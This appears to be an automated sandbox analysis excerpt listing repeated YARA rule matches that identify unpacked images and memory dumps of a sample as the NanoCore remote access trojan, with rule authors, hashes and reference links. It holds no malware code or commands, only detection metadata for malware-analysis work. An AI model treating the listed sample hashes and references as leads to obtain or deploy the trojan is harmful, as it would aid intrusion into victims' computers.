Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.45f36dc.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473702f.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
